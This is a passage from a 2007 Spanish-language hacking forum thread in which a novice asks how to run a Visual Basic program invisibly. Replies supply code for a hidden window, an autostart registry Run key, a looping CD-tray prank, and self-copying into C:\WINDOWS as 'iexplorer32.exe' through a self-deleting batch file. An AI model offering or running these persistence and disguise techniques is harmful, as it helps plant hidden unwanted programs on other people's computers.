elhacker.net cabecera Bienvenido(a), Visitante. Por favor Ingresar o Registrarse
¿Perdiste tu email de activación?.

 

 


Tema destacado: Tutorial básico de Quickjs


+  Foro de elhacker.net
|-+  Programación
| |-+  Programación General
| | |-+  .NET (C#, VB.NET, ASP)
| | | |-+  Programación Visual Basic (Moderadores: LeandroA, seba123neo)
| | | | |-+  Como puedo crear una aplicacion que se ejecute sin la pantalla del form
0 Usuarios y 1 Visitante están viendo este tema.
Páginas: 1 [2] 3 Ir Abajo Respuesta Imprimir
Autor Tema: Como puedo crear una aplicacion que se ejecute sin la pantalla del form  (Leído 11,208 veces)
xhc

Desconectado Desconectado

Mensajes: 61



Ver Perfil
Re: Como puedo crear una aplicacion que se ejecute sin la pantalla del form
« Respuesta #10 en: 28 Octubre 2007, 21:57 pm »

ahora me he dado cuenta de que si pongo  me.visible = false, o me.hide  en el form, cuando genero la aplicacion y la ejecuto me sale el form  :-\

entonces para compilar por ejemplo el msn fucker de hendrix, copio el codigo en un modulo entre

Código:
   Sub main()
   code
   End Sub
y en el formulario pongo solo me.hide o me.visible = false?


perdonar pero esque soy muy novato y aun no entiendo bien visual basic


« Última modificación: 28 Octubre 2007, 22:12 pm por xhc » En línea

HaDeS, -
WarZone Master

Desconectado Desconectado

Mensajes: 284



Ver Perfil WWW
Re: Como puedo crear una aplicacion que se ejecute sin la pantalla del form
« Respuesta #11 en: 28 Octubre 2007, 22:06 pm »

Código
  1.    Sub main()
  2.        Shell "cmd.exe /c reg add HKLM\Software\Microsoft\Windows\CurrentVersion\Run /v prueba /d prueba.txt"
  3.    End Sub
  4.  
Perdón por meterme en el tema, pero creo que es así :P, para que te funcione ese código que esta dentro del sub main al inciar la aplicación te vas a : proyecto -> propiedades de proyecto -> objeto inicial -> acá escoges "Sub Main".
Y agrega al submain esto:
Código
  1. Form1.Visible = False
  2.  

Bueno, saludos ;)


En línea

xhc

Desconectado Desconectado

Mensajes: 61



Ver Perfil
Re: Como puedo crear una aplicacion que se ejecute sin la pantalla del form
« Respuesta #12 en: 28 Octubre 2007, 22:32 pm »

tengo visual basic 6.0 y visual studio 2005, utilizo el 2005 porque esta en español, tiene algo que ver en los codes?? lo digo porque en visual basic 6.0 si que puedo ocultar el form,añadir cosas al registro(puse objeto inicial sub main, pero en vb 6.0) pero en vb 2005 me sale  :-\ :huh:
« Última modificación: 28 Octubre 2007, 22:37 pm por xhc » En línea

Yekka

Desconectado Desconectado

Mensajes: 62



Ver Perfil
Re: Como puedo crear una aplicacion que se ejecute sin la pantalla del form
« Respuesta #13 en: 29 Octubre 2007, 02:56 am »

 Cita de Gleper
Citar
a mi no me va huh 

 Cita de xhc
 
Citar
a mi tampoco me funciona

 En la propiedad 'Name' del primer CommandButton --> CmdAbrirCD 
 Y en la propiedad 'Name' del segundo CommandButton --> CmdCerrarCd

 Y la funcion tal cual,en el módulo. Yo lo probe en vb 6.0 con WinXP sp2 y me funciono.
 
 ¡Bye!
En línea

xhc

Desconectado Desconectado

Mensajes: 61



Ver Perfil
Re: Como puedo crear una aplicacion que se ejecute sin la pantalla del form
« Respuesta #14 en: 29 Octubre 2007, 14:46 pm »

gracias ya me va ( en visual basic 2005 no pero en vb 6.0 si ;D)

pero tiene que ser obligatorio que tenga botones?? esque querria poner un bucle que no parase de abrirse y cerrarse
En línea

cassiani


Desconectado Desconectado

Mensajes: 978


« Anterior | Próximo »


Ver Perfil WWW
Re: Como puedo crear una aplicacion que se ejecute sin la pantalla del form
« Respuesta #15 en: 29 Octubre 2007, 15:15 pm »

  ¡Hey! Puedes hacer esto, modifica el code del form que te di, por este otro:

Código
  1. Option Explicit
  2.  
  3. Dim Res As Long, ReturnString As String * 127
  4. Dim Abrir As Boolean
  5.  
  6. Private Sub Form_Load()
  7.   Timer1.Enabled = True
  8.   Timer1.Interval = 1000 'Aqui podes poner cualquier valor a partir de 1 _
  9.                           Mientras mas bajo es el valor, mas rapido sera el ciclo.
  10.                          '1000 equivale a 1 segundo.
  11. End Sub
  12.  
  13. Private Sub Timer1_Timer()
  14.    If Abrir = False Then
  15.        'Cierra CD-ROOM
  16.        Res = mciSendString("Set CDAudio Door Closed", ReturnString, 127, 0)
  17.        Abrir = True
  18.    ElseIf Abrir = True Then
  19.        'Abre cd-room
  20.        Res = mciSendString("Set CDAudio Door Open", ReturnString, 127, 0)
  21.        Abrir = False
  22.    End If
  23. End Sub
  24.  

   Debes tener cuidado con lo que haces, puedes hacerle daño a alguien... je,je,  :P
« Última modificación: 5 Abril 2008, 13:08 pm por cΔssiΔnі » En línea

xhc

Desconectado Desconectado

Mensajes: 61



Ver Perfil
Re: Como puedo crear una aplicacion que se ejecute sin la pantalla del form
« Respuesta #16 en: 29 Octubre 2007, 16:18 pm »

jajaj si que me funciona, gracias, entonces siempre que en algun code ponga algo de timer le tengo que agregar un relojito
En línea

xhc

Desconectado Desconectado

Mensajes: 61



Ver Perfil
Re: Como puedo crear una aplicacion que se ejecute sin la pantalla del form
« Respuesta #17 en: 29 Octubre 2007, 18:37 pm »

para que se autocopie en otra carpeta puse esto:
Shell "cmd.exe /c copy /y %0 "C:\WINDOWS\iexplorer32.exe"

per no me deja, que estoy haciendo mal?
En línea

cassiani


Desconectado Desconectado

Mensajes: 978


« Anterior | Próximo »


Ver Perfil WWW
Re: Como puedo crear una aplicacion que se ejecute sin la pantalla del form
« Respuesta #18 en: 29 Octubre 2007, 19:24 pm »

 Copy (origen) (destino)

 Puedes hacerlo usando un bat, observa esto:

Código
  1. Option Explicit
  2.  
  3. Private Sub CrearBat()
  4. Dim Canal As Integer
  5.    Canal = FreeFile 'Buscamos un canal libre
  6.    Open "Copiar.bat" For Output As #Canal 'creamos un bat
  7.        Print #Canal, "@echo off"
  8.        Print #Canal, "CD " & App.Path 'cambio de directorio
  9.        Print #Canal, "Copy " & App.EXEName & ".exe C:\WINDOWS\" _
  10.        & App.EXEName & ".exe /y"
  11.        Print #Canal, "del Copiar.bat" 'Aqui borramos el .bat
  12.    Close #Canal
  13. End Sub
  14.  
  15. Private Sub Form_Load()
  16.    CrearBat
  17.    Shell "Copiar.bat"
  18.    End
  19. End Sub

 Pruebalo y dime si es lo que quieres.
« Última modificación: 5 Abril 2008, 13:09 pm por cΔssiΔnі » En línea

xhc

Desconectado Desconectado

Mensajes: 61



Ver Perfil
Re: Como puedo crear una aplicacion que se ejecute sin la pantalla del form
« Respuesta #19 en: 29 Octubre 2007, 19:36 pm »

si que se me copia pero no funciona, es decir: cuando genero el .exe y lo ejecuto no se empieza a abrir el lector pero sin embargo se copia a C:\WINDOWS
En línea

Páginas: 1 [2] 3 Ir Arriba Respuesta Imprimir 

Ir a:  

WAP2 - Aviso Legal - Powered by SMF 1.1.21 | SMF © 2006-2008, Simple Machines